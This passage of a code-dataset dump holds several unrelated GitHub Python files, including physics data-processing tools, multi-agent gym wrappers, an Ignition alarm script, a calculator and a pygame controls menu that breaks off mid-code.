Pilih Kembali: \")\n\ndef Segitiga():\n print(\"1. Luas Segitiga\")\n print(\"2. Keliling Segitiga\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Segitiga()\n break\n elif pilihan == \"2\":\n rumusKeliling_Segitiga()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \")\n\ndef Lingkaran():\n print(\"1. Luas Lingkaran\")\n print(\"2. Keliling Lingkaran\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Lingkaran()\n break\n elif pilihan == \"2\":\n rumusKeliling_Lingkaran()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. 
Pilih Kembali: \") \n","repo_name":"fahrilshaputraa/TugasPyBootcamp","sub_path":"wildan/tugas bangun datar/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"883868055","text":"import sys\nimport os\nimport numpy as np\nimport pandas as pd\npd.options.mode.chained_assignment = None\n\nfrom fax_production_process import ProductionProcess\nimport hax\n\n\nclass BuildMiniTree(ProductionProcess):\n    '''Run hax to create minitree'''\n\n    process_order = 5\n    __version__ = '0.0.1'\n\n    def _check(self):\n        return os.path.isfile('{minitree_pickle_path}/{production_id}.h5'.format(minitree_pickle_path=self.config['DIRECTORY']['minitree_pickle'], production_id=self.production_id))\n\n    def hax_init(self, force_reload=False):\n        self.main_data_path = self.config['DIRECTORY']['processed']\n        self.minitree_path = self.config['DIRECTORY']['minitree']\n\n        # Trick learned from Daniel Coderre's DAQVeto lichen\n        if (not len(hax.config)) or force_reload:\n            # User didn't init hax yet... let's do it now\n            hax.init(experiment='XENON1T',\n                     main_data_paths=[self.main_data_path],\n                     minitree_paths=[self.minitree_path],\n                     version_policy='loose'\n                     )\n\n        elif not (self.main_data_path in hax.config['main_data_paths']):\n            hax.config['main_data_paths'] = ['.', self.main_data_path]\n\n        elif not (self.minitree_path == hax.config['minitree_paths'][0]):\n            hax.config['minitree_paths'] = [self.minitree_path]\n\n    def _process(self):\n        self.hax_init(force_reload=False)\n        self.minitree_pickle_path = self.config['DIRECTORY']['minitree_pickle']\n\n        with self._divert_stdout():\n            self.df = hax.minitrees.load(\n                self.production_id, ['Basics', 'Fundamentals'])\n            self.df.to_hdf(os.path.join(\n                self.minitree_pickle_path, '{name}.h5'.format(name=self.production_id)), 'table')\n            print('{production_id} minitrees building success :)'.format(\n                production_id=self.production_id))\n","repo_name":"XENON1T/processing","sub_path":"montecarlo/fax_waveform_py/production_process/BuildMinitree.py","file_name":"BuildMinitree.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37130028079","text":"\"\"\"\nA module to encapsulate a Likelihood source model xml file.\n\n@author J. 
Chiang \n\n$Header$\n\"\"\"\nimport os, sys\nfrom xml.dom import minidom\nfrom cleanXml import cleanXml\n\ndefaultModel = '\\n'.join( ('<?xml version=\"1.0\" ?>',\n                           '<source_library title=\"source library\">',\n                           '</source_library>') )\n\nclass SourceModel:\n    def __init__(self, xmlFile=None):\n        if xmlFile and os.path.isfile(xmlFile):\n            self.filename = xmlFile.strip(\" \")\n            self.doc = minidom.parse(self.filename)\n        else:\n            self.filename = xmlFile\n            self.doc = minidom.parseString(defaultModel)\n        srcs = self.doc.getElementsByTagName(\"source\")\n        self.srcList = {}\n        try:\n            for src in srcs:\n                self.srcList[src.getAttribute(\"name\")] = Source(src)\n        except ValueError:\n            pass\n    def setAttributes(self):\n        for src in self.srcList.values():\n            src.setAttributes()\n    def __getitem__(self, name):\n        return self.srcList[name]\n    def __setitem__(self, name, value):\n        self.srcList[name] = value\n        source_library = self.doc.getElementsByTagName('source_library')[0]\n        source_library.appendChild(value.node)\n    def __delitem__(self, name):\n        source_library = self.doc.getElementsByTagName('source_library')[0]\n        source_library.removeChild(self.srcList[name].node)\n        del self.srcList[name]\n    def names(self):\n        return self.srcList.keys()\n    def writeTo(self, filename=None):\n        if filename == None: # Overwrite the existing file.\n            filename = self.filename\n        self.setAttributes()\n        try:\n            doc = cleanXml(self.doc)\n        except:\n            doc = self.doc\n        file = open(filename, 'w')\n        file.write(doc.toxml() + '\\n')\n        file.close()\n        self.filename = filename\n\nclass DomElement:\n    def __init__(self, node, converter=None):\n        self.node = node\n        attributes = {}\n        for key in node.attributes.keys():\n            if converter and key != \"name\" and key != \"free\":\n                attributes[key] = converter(node.getAttribute(key))\n# An ugly kludge here since each Parameter's \"free\" flag needs to be int.\n            elif key == \"free\":\n                attributes[key] = int(node.getAttribute(key))\n            else:\n                attributes[key] = node.getAttribute(key)\n        self.__dict__.update(attributes)\n    def deleteChildElements(self, tagName):\n        children = self.node.getElementsByTagName(tagName)\n        for child in children:\n            self.node.removeChild(child)\n    def setAttributes(self):\n        for key in self.node.attributes.keys():\n            self.node.setAttribute(key, \"%s\" % self.__dict__[key])\n    \nclass Source(DomElement):\n    def __init__(self, node):\n        DomElement.__init__(self, node)\n        self.functions = {}\n        (spectrum, ) = node.getElementsByTagName(\"spectrum\")\n        self.functions[\"spectrum\"] = Function(spectrum)\n        (spatialModel, ) = node.getElementsByTagName(\"spatialModel\")\n        self.functions[\"spatialModel\"] = Function(spatialModel)\n        self.__dict__.update(self.functions)\n        self.show = 1\n    def setAttributes(self):\n        DomElement.setAttributes(self)\n        for func in self.functions.values():\n            func.setAttributes()\n    def summary(self):\n        if self.type == \"PointSource\":\n            (line, ) = (\"%s: %.2f; (RA, Dec) = (%.2f, %.2f)\"\n                        % (self.name, self.flux(), \n                           self.spatialModel.RA.value,\n                           self.spatialModel.DEC.value), )\n        else:\n            line = \"%s: %.2f\" % (self.name, self.spectrum.Prefactor.value)\n        return line\n    def flux(self, emin=30):\n        (prefactor, ) = (self.spectrum.Prefactor.value\n                         *self.spectrum.Prefactor.scale, )\n        gamma = -self.spectrum.Index.value\n        e0 = self.spectrum.Scale.value\n        return prefactor*e0/(gamma-1)*(emin/e0)**(1.-gamma)*1e8\n\nclass Function(DomElement):\n    def __init__(self, node):\n        DomElement.__init__(self, node)\n        self.parameters = {}\n        paramElements = node.getElementsByTagName(\"parameter\")\n        for param in paramElements:\n            name = param.getAttribute(\"name\")\n            self.parameters[name] = 
Parameter(param)\n self.__dict__.update(self.parameters)\n def setAttributes(self):\n DomElement.setAttributes(self)\n for param in self.parameters.values():\n param.setAttributes()\n\nclass Parameter(DomElement):\n def __init__(self, node):\n DomElement.__init__(self, node, float)\n","repo_name":"fermi-lat/sane","sub_path":"python/readXml.py","file_name":"readXml.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29576306512","text":"class Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n \"\"\"\n RUNTIME: 66 ms (97.37%)\n MEMORY: 13.9 MB (75.79%)\n \"\"\"\n ans = 0\n for i in range(len(points)):\n hashmap = {}\n for j in range(i):\n slope = self.getSlope(points[i], points[j])\n hashmap[slope] = 1 + hashmap.get(slope,0)\n if hashmap.values():\n ans = max(ans, max(hashmap.values()))\n return ans + 1\n\n def getSlope(self, p1, p2):\n if p1[0] - p2[0] == 0:\n return 'inf'\n return (p1[1] - p2[1]) / (p1[0] - p2[0])\n","repo_name":"bxtbold/coding-solutions","sub_path":"leetcode/0149-max-points-on-a-line/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"38025405523","text":"import gym\nimport numpy as np\nfrom scipy.linalg import circulant\nfrom gym.spaces import Tuple, Box, Dict\nfrom copy import deepcopy\n\n\nclass SplitMultiAgentActions(gym.ActionWrapper):\n '''\n Splits mujoco generated actions into a dict of tuple actions.\n '''\n def __init__(self, env):\n super().__init__(env)\n self.n_agents = self.metadata['n_actors']\n lows = np.split(self.action_space.low, self.n_agents)\n highs = np.split(self.action_space.high, self.n_agents)\n self.action_space = Dict({\n 'action_movement': Tuple([Box(low=low, high=high, dtype=self.action_space.dtype)\n for low, high in zip(lows, highs)])\n })\n\n def action(self, action):\n return action['action_movement'].flatten()\n\n\nclass JoinMultiAgentActions(gym.ActionWrapper):\n def __init__(self, env):\n super().__init__(env)\n self.n_agents = self.metadata['n_actors']\n low = np.concatenate([space.low for space in self.action_space.spaces])\n high = np.concatenate([space.high for space in self.action_space.spaces])\n self.action_space = Box(low=low, high=high, dtype=self.action_space.spaces[0].dtype)\n\n def action(self, action):\n # action should be a tuple of different agent actions\n return np.split(action, self.n_agents)\n\n\nclass SplitObservations(gym.ObservationWrapper):\n \"\"\"\n Split observations for each agent.\n Args:\n keys_self: list of observation names which are agent specific. E.g. this will\n permute qpos such that each agent sees its own qpos as the first numbers\n keys_copy: list of observation names that are just passed down as is\n keys_self_matrices: list of observation names that should be (n_agent, n_agent, dim) where\n each agent has a custom observation of another agent. 
This is different from self_keys\n in that self_keys we assume that observations are symmetric, whereas these can represent\n unique pairwise interactions/observations\n \"\"\"\n def __init__(self, env, keys_self, keys_copy=[], keys_self_matrices=[]):\n super().__init__(env)\n self.keys_self = sorted(keys_self)\n self.keys_copy = sorted(keys_copy)\n self.keys_self_matrices = sorted(keys_self_matrices)\n self.n_agents = self.metadata['n_agents']\n new_spaces = {}\n for k, v in self.observation_space.spaces.items():\n # If obs is a self obs, then we only want to include other agents obs,\n # as we will pass the self obs separately.\n assert len(v.shape) > 1, f'Obs {k} has shape {v.shape}'\n if 'mask' in k and k not in self.keys_self_matrices:\n new_spaces[k] = v\n elif k in self.keys_self_matrices:\n new_spaces[k] = Box(low=v.low[:, 1:], high=v.high[:, 1:], dtype=v.dtype)\n elif k in self.keys_self:\n assert v.shape[0] == self.n_agents, \\\n f\"For self obs, obs dim 0 should equal number of agents. {k} has shape {v.shape}\"\n obs_shape = (v.shape[0], self.n_agents - 1, v.shape[1])\n lows = np.tile(v.low, self.n_agents - 1).reshape(obs_shape)\n highs = np.tile(v.high, self.n_agents - 1).reshape(obs_shape)\n new_spaces[k] = Box(low=lows, high=highs, dtype=v.dtype)\n elif k in self.keys_copy:\n new_spaces[k] = deepcopy(v)\n else:\n obs_shape = (v.shape[0], self.n_agents, v.shape[1])\n lows = np.tile(v.low, self.n_agents).reshape(obs_shape).transpose((1, 0, 2))\n highs = np.tile(v.high, self.n_agents).reshape(obs_shape).transpose((1, 0, 2))\n new_spaces[k] = Box(low=lows, high=highs, dtype=v.dtype)\n\n for k in self.keys_self:\n new_spaces[k + '_self'] = self.observation_space.spaces[k]\n\n self.observation_space = Dict(new_spaces)\n\n def observation(self, obs):\n new_obs = {}\n for k, v in obs.items():\n # Masks that aren't self matrices should just be copied\n if 'mask' in k and k not in self.keys_self_matrices:\n new_obs[k] = obs[k]\n # Circulant self matrices\n elif k in self.keys_self_matrices:\n new_obs[k] = self._process_self_matrix(obs[k])\n # Circulant self keys\n elif k in self.keys_self:\n new_obs[k + '_self'] = obs[k]\n new_obs[k] = obs[k][circulant(np.arange(self.n_agents))]\n new_obs[k] = new_obs[k][:, 1:, :] # Remove self observation\n elif k in self.keys_copy:\n new_obs[k] = obs[k]\n # Everything else should just get copied for each agent (e.g. external obs)\n else:\n new_obs[k] = np.tile(v, self.n_agents).reshape([v.shape[0], self.n_agents, v.shape[1]]).transpose((1, 0, 2))\n\n return new_obs\n\n def _process_self_matrix(self, self_matrix):\n '''\n self_matrix will be a (n_agent, n_agent) boolean matrix. Permute each row such that the matrix is consistent with\n the circulant permutation used for self observations. E.g. 
this should be used for agent-agent masks\n        '''\n        assert np.all(self_matrix.shape[:2] == np.array((self.n_agents, self.n_agents))), \\\n            f\"The first two dimensions of {self_matrix} were not (n_agents, n_agents)\"\n\n        new_mat = self_matrix.copy()\n        # Permute each row to the right by one more than the previous\n        # E.g., [[1,2],[3,4]] -> [[1,2],[4,3]]\n        idx = circulant(np.arange(self.n_agents))\n        new_mat = new_mat[np.arange(self.n_agents)[:, None], idx]\n        new_mat = new_mat[:, 1:]  # Remove self observation\n        return new_mat\n\n\nclass SelectKeysWrapper(gym.ObservationWrapper):\n    \"\"\"\n    Select keys for final observations.\n    Expects that all observations come in shape (n_agents, n_objects, n_dims)\n    Args:\n        keys_self (list): observation names that are specific to an agent\n            These will be concatenated into 'observation_self' observation\n        keys_other (list): observation names that should be passed through\n        flatten (bool): if true, flatten internal and external observations and\n            concatenate them into the single 'observation_self' observation\n    \"\"\"\n\n    def __init__(self, env, keys_self, keys_other, flatten=False):\n        super().__init__(env)\n        self.keys_self = sorted([k + '_self' for k in keys_self])\n        self.keys_other = sorted(keys_other)\n        self.flatten = flatten\n\n        # Change observation space to look like a single agent observation space.\n        # This makes constructing policies much easier\n        if flatten:\n            size_self = sum([np.prod(self.env.observation_space.spaces[k].shape[1:])\n                             for k in self.keys_self + self.keys_other])\n            self.observation_space = Dict(\n                {'observation_self': Box(-np.inf, np.inf, (size_self,), np.float32)})\n        else:\n            size_self = sum([self.env.observation_space.spaces[k].shape[1]\n                             for k in self.keys_self])\n            obs_self = {'observation_self': Box(-np.inf, np.inf, (size_self,), np.float32)}\n            obs_extern = {k: Box(-np.inf, np.inf, v.shape[1:], np.float32)\n                          for k, v in self.observation_space.spaces.items()\n                          if k in self.keys_other}\n            obs_self.update(obs_extern)\n            self.observation_space = Dict(obs_self)\n\n    def observation(self, observation):\n        if self.flatten:\n            other_obs = [observation[k].reshape((observation[k].shape[0], -1))\n                         for k in self.keys_other]\n            obs = np.concatenate([observation[k] for k in self.keys_self] + other_obs, axis=-1)\n            return {'observation_self': obs}\n        else:\n            obs = np.concatenate([observation[k] for k in self.keys_self], -1)\n            obs = {'observation_self': obs}\n            other_obs = {k: v for k, v in observation.items() if k in self.keys_other}\n            obs.update(other_obs)\n            return obs\n","repo_name":"openai/multi-agent-emergence-environments","sub_path":"mae_envs/wrappers/multi_agent.py","file_name":"multi_agent.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1523,"dataset":"github-code","pt":"5"} +{"seq_id":"73198464151","text":"def getAlarmsPaths(config, currentTagPath, instances=[], templateParams={}, recursive=False, alarmReplace={},\n                   excludePriority={\"Diagnostic\"}):\n    \"\"\"\n    Recursively search for the alarms under the given alarm paths\n    :param config: Dict. The configuration result from system.tag.getConfiguration function\n    :param currentTagPath: String. The current base tag path.\n    :param instances: List. A list consisting of all found alarm paths, for Perspective template repeater\n    :param templateParams: Dict. The parameters for the template.\n    :param recursive: Bool. True to enable recursive search for all alarms under that path\n    :param alarmReplace: Dict. Values to replace in the alarm names\n    :param excludePriority: Set. 
Set of alarms with priority to exclude.\n :return:\n \"\"\"\n if 'alarms' in config.keys():\n for alarm in config['alarms']:\n if \"priority\" not in alarm:\n alarm[\"priority\"] = \"Low\"\n if str(alarm[\"priority\"]) in excludePriority:\n continue\n _params = dict(templateParams)\n _name = alarm['name']\n _params[\"displayName\"] = _name if _name not in alarmReplace.keys() else alarmReplace[_name]\n _params[\"tagPath\"] = currentTagPath + \"/Alarms/\" + alarm['name'] + \".IsActive\"\n instances.append(_params)\n\n if 'tags' in config.keys():\n for tag in config['tags']:\n getAlarmsPaths(tag, currentTagPath + \"/\" + str(tag['path']), instances, templateParams, recursive,\n alarmReplace,\n excludePriority)\n\n\ndef loadRepeater(tagPaths, templateParams, sortAsc=True, alarmNameReplaceOrigin=None,\n alarmNameReplaceValue=None, excludePriority=set([]), recursive=True):\n tr_ins = []\n alarmReplace = {}\n if alarmNameReplaceOrigin is not None and alarmNameReplaceValue is not None and len(alarmNameReplaceOrigin) == len(\n alarmNameReplaceValue):\n alarmReplace = {key: value for key, value in zip(alarmNameReplaceOrigin, alarmNameReplaceValue)}\n\n for tagPath in tagPaths:\n if not system.tag.exists(tagPath):\n continue\n\n config = system.tag.getConfiguration(tagPath, recursive)[0]\n getAlarmsPaths(config, str(tagPath), instances=tr_ins,\n templateParams=templateParams, recursive=recursive, alarmReplace=alarmReplace,\n excludePriority=excludePriority)\n\n tr_ins = sorted(tr_ins, key=lambda x: x['displayName'], reverse=sortAsc)\n\n return tr_ins","repo_name":"wendajrrc/alarm-status-repeater","sub_path":"ignition/script-python/AlarmRepeater/Repeater/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13625007327","text":"def userInput():\n while True:\n operation = str(input(\"\"\"Choose an operation: \n a. Add\n b. Subtract\n c. Multiple\n d. Divide\n e. Exit\nChoice: \"\"\"))\n if operation.lower() == 'a':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Sum of {num1} & {num2}:\", addNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'b':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Difference of {num1} & {num2}:\", subtractNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'c':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n print(f\"Product of {num1} & {num2}:\", multiplyNums(num1, num2))\n tryAgain()\n elif operation.lower() == 'd':\n num1 = float(input(\"Enter 1st number: \"))\n num2 = float(input(\"Enter 2nd number: \"))\n if num2 != 0:\n print(f\"Quotient of {num1} & {num2}:\", divideNums(num1, num2))\n tryAgain()\n else:\n print(\"\"\"\n Invalid input\n Divisor cannot be zero (0) for division.\n \"\"\")\n tryAgain()\n elif operation.lower() == 'e':\n quit()\n break\n else:\n raise Exception\n break\n\ndef addNums(num1, num2):\n sum = num1 + num2\n return sum\n\ndef subtractNums(num1, num2):\n difference = num1 - num2\n return difference\n\ndef multiplyNums(num1, num2):\n product = num1 * num2\n return product\n\ndef divideNums(num1, num2):\n quotient = num1 / num2\n return quotient\n\ndef tryAgain():\n tryAgainChoice = str(input(\"\\nDo you want to try again? 
Y (yes) or N (no): \"))\n if tryAgainChoice.upper() == 'Y':\n userInput()\n elif tryAgainChoice.upper() == 'N':\n quit()\n else:\n raise Exception\n\ntry:\n userInput()\nexcept Exception:\n print(\"\"\"\n Invalid input\n Use only the appropriate choice for operations.\n \"\"\")\n\n\n","repo_name":"zenpao/Python-Script-Collection","sub_path":"Intermediate Python Programming Essentials/Day 7 [Module,Exceptions]/javier_jentzenpaolo_day7_act2.py","file_name":"javier_jentzenpaolo_day7_act2.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24178885887","text":"import pygame as p\r\nimport sys\r\nimport lvl_1\r\n\r\np.init()\r\np.mixer.init()\r\np.display.set_caption(\"Tower-Madness\")\r\nfont= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',35)\r\nfont_3= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',30)\r\nfont_4= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',50)\r\nfont_1= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',100)\r\nfont_2= p.font.Font('Fuentes\\\\spacerunnertwoital.TTF',150)\r\nfont_5= p.font.Font('Fuentes\\\\raidercrusaderpunch.TTF',30)\r\nclock=p.time.Clock()\r\nsize=width,height=1280,720\r\npantalla=p.display.set_mode(size)\r\nbg_image=p.image.load(\"images\\\\fondo-proyecto.png\")\r\nbg_image=bg_image.convert()\r\nboton=p.image.load(\"images\\\\boton.png\")\r\nback=p.image.load(\"images\\\\flecha-regresar.png\")\r\nselect=p.mixer.Sound('efectos\\\\sonido_boton.wav')\r\ntap=p.mixer.Sound('efectos\\\\boton_tap.wav')\r\n#p.mixer.music.load(\"effectos\\\\fondo.wav\")\r\n#p.mixer.music.play(-1)\r\n#p.mixer.music.set_volume(0.2)\r\ncanal1=p.mixer.Channel(0)\r\ncanal2=p.mixer.Channel(1)\r\n#carga de imagenes del teclado\r\ncentro=1280/2\r\nescala=0.7\r\nA=[]\r\nD=[]\r\nS=[]\r\nW=[]\r\nEnter=[]\r\nUp=[]\r\nLeft=[]\r\nDown=[]\r\nRight=[]\r\nMouse_moveL=[]\r\nMouse_moveR=[]\r\nMouse_moveU=[]\r\nMouse_moveD=[]\r\nMouse_clickR=[]\r\nMouse_clickL=[]\r\nborrar=[]\r\nTitulos=[\"MOVIMIENTO\",\"COLOCAR TORRETAS\",\"QUITAR TORRETAS\"]\r\nMovimiento=[]\r\nMovimiento2=[]\r\nMovimiento3=[]\r\nMovimiento4=[]\r\n\"\"\"Colocar_torretas=[]\r\nQuitar_Torretas=[]\r\npaginas=[]\"\"\"\r\nfor i in range(2):\r\n A.append(p.image.load(\"teclado\\\\A\"+str(i)+\".png\").convert_alpha())\r\n D.append(p.image.load(\"teclado\\\\D\"+str(i)+\".png\").convert_alpha())\r\n S.append(p.image.load(\"teclado\\\\S\"+str(i)+\".png\").convert_alpha())\r\n W.append(p.image.load(\"teclado\\\\W\"+str(i)+\".png\").convert_alpha())\r\n Enter.append(p.image.load(\"teclado\\\\enter\"+str(i)+\".png\").convert_alpha())\r\n Up.append(p.image.load(\"teclado\\\\up\"+str(i)+\".png\").convert_alpha())\r\n Left.append(p.image.load(\"teclado\\\\left\"+str(i)+\".png\").convert_alpha())\r\n Down.append(p.image.load(\"teclado\\\\down\"+str(i)+\".png\").convert_alpha())\r\n Right.append(p.image.load(\"teclado\\\\rigth\"+str(i)+\".png\").convert_alpha())\r\n borrar.append(p.image.load(\"teclado\\\\del\"+str(i)+\".png\").convert_alpha())\r\n Mouse_clickL.append(p.image.load(\"teclado\\\\MB\"+str(i)+\".png\").convert_alpha())\r\n Mouse_clickR.append(p.image.load(\"teclado\\\\MB\"+str(i*2)+\".png\").convert_alpha())\r\n Mouse_moveL.append(p.image.load(\"teclado\\\\M\"+str(i)+\".png\").convert_alpha())\r\n Mouse_moveU.append(p.image.load(\"teclado\\\\M\"+str(i*2)+\".png\").convert_alpha())\r\n Mouse_moveR.append(p.image.load(\"teclado\\\\M\"+str(i*3)+\".png\").convert_alpha())\r\n 
Mouse_moveD.append(p.image.load(\"teclado\\\\M\"+str(i*4)+\".png\").convert_alpha())\r\n A[i]=p.transform.rotozoom(A[i], 0, escala)\r\n D[i]=p.transform.rotozoom(D[i], 0, escala)\r\n S[i]=p.transform.rotozoom(S[i], 0, escala)\r\n W[i]=p.transform.rotozoom(W[i], 0, escala)\r\n Up[i]=p.transform.rotozoom(Up[i], 0, escala)\r\n Left[i]=p.transform.rotozoom(Left[i], 0, escala)\r\n Down[i]=p.transform.rotozoom(Down[i], 0, escala)\r\n Right[i]=p.transform.rotozoom(Right[i], 0, escala)\r\n Mouse_moveL[i]=p.transform.rotozoom(Mouse_moveL[i], 0, escala*4)\r\n Mouse_moveU[i]=p.transform.rotozoom(Mouse_moveU[i], 0, escala*4)\r\n Mouse_moveD[i]=p.transform.rotozoom(Mouse_moveD[i], 0, escala*4)\r\n Mouse_moveR[i]=p.transform.rotozoom(Mouse_moveR[i], 0, escala*4)\r\n Mouse_clickL[i]=p.transform.rotozoom(Mouse_clickL[i], 0, escala*4)\r\n Mouse_clickR[i]=p.transform.rotozoom(Mouse_clickR[i], 0, escala*4)\r\n Enter[i]=p.transform.rotozoom(Enter[i], 0, escala*2)\r\n borrar[i]=p.transform.rotozoom(borrar[i], 0, escala*2)\r\nfor i in range(4):\r\n Movimiento.append(p.image.load(\"teclado\\\\\"+str(i)+\".png\").convert_alpha())\r\n Movimiento[i]=p.transform.rotozoom(Movimiento[i], 0, 0.8)\r\n \r\nfor i in range(3):\r\n Movimiento2.append(p.image.load(\"teclado\\\\\"+str(i+5)+\".png\").convert_alpha())\r\n Movimiento2[i]=p.transform.rotozoom(Movimiento2[i], 0, 0.8)\r\nfor i in range(10):\r\n Movimiento3.append(p.image.load(\"teclado\\\\\"+str(i+8)+\".png\").convert_alpha())\r\n Movimiento3[i]=p.transform.rotozoom(Movimiento3[i], 0, 0.8)\r\n Movimiento4.append(p.image.load(\"teclado\\\\\"+str(i+18)+\".png\").convert_alpha())\r\n Movimiento4[i]=p.transform.rotozoom(Movimiento4[i], 0, 0.8)\r\ndef draw_txt(texto, font, color, surface, x, y):\r\n textobj=font.render(texto, True, color)\r\n textrect=textobj.get_rect(center=(x,y))\r\n #textrect.topleft=( x, y)\r\n surface.blit(textobj,textrect)\r\n\r\ndef controles_1(controles,volumen):\r\n running = True \r\n click=False\r\n al,al1,al2,al3,al4,al5,al6=0,0,3,0,3,0,0\r\n count=0\r\n pos1=180,550\r\n pos2=180,410\r\n pos3=1080,500\r\n color=[(255,255,255),(0,0,0)]\r\n continuar=False\r\n space=False\r\n page=0\r\n while running:\r\n pantalla.blit(bg_image,(0,0))\r\n draw_txt(\"COMO JUGAR\",font_1, (0,0,0),pantalla,centro+13,83)\r\n draw_txt(\"COMO JUGAR\",font_1, (255,255,255),pantalla,centro,80)\r\n draw_txt(\"MOUSE\", font_4, (0,0,0), pantalla, 1090,238)\r\n draw_txt(\"MOUSE\", font_4, (255,255,255), pantalla, 1090,235)\r\n draw_txt(\"TECLADO\", font_4, (0,0,0), pantalla, 180,238)\r\n draw_txt(\"TECLADO\", font_4, (255,255,255), pantalla, 180,235)\r\n draw_txt(Titulos[page], font_4, (0,0,0), pantalla, centro+13, 188)\r\n draw_txt(Titulos[page], font_4, (255,255,255), pantalla, centro, 185)\r\n if al<=2-0.03:\r\n al+=0.03\r\n else:\r\n al=0\r\n count+=1\r\n if al1<4-0.015:\r\n al1+=0.015\r\n else:\r\n al1=0\r\n if al2>=0:#.015:\r\n al2-=0.015\r\n else:\r\n al2=4-0.015\r\n if al5<=2-0.1:\r\n al5+=0.1\r\n else:\r\n al5=0\r\n if al6<10-0.03:\r\n al6+=0.03\r\n else:\r\n al6=0\r\n casilla=False\r\n\r\n if page==0:\r\n if count<3:\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento[int(al1)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n centro_img4=Mouse_moveL[0].get_rect(center=pos3)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[int(al)],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n 
pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[int(al)],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveL[int(al)],centro_img4)\r\n elif count>=3 and count<6:\r\n continuar=True\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento[int(al2)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[int(al)],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[int(al)],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveR[int(al)],centro_img4)\r\n elif count>=6 and count<8:\r\n if al3<3-0.015:\r\n al3+=0.015\r\n else:\r\n al1=0\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento2[int(al3)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[0],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[int(al)],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[0],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n pantalla.blit(Up[int(al)],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveU[int(al)],centro_img4)\r\n elif count>=8 and count<10:\r\n if al4>=0.015:\r\n al4-=0.015\r\n else:\r\n al4=2-0.015\r\n centro_img3=Movimiento[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento2[int(al4)],centro_img3)\r\n centro_img1=A[0].get_rect(center=(pos1))\r\n centro_img2=Down[0].get_rect(center=pos2)\r\n pantalla.blit(S[int(al)],centro_img1)\r\n pantalla.blit(A[0],(centro_img1[0]-70,centro_img1[1]))\r\n pantalla.blit(D[0],(centro_img1[0]+70,centro_img1[1]))\r\n pantalla.blit(W[0],(centro_img1[0],centro_img1[1]-70))\r\n pantalla.blit(Down[int(al)],centro_img2)\r\n pantalla.blit(Left[0],(centro_img2[0]-70,centro_img2[1]))\r\n pantalla.blit(Right[0],(centro_img2[0]+70,centro_img2[1]))\r\n 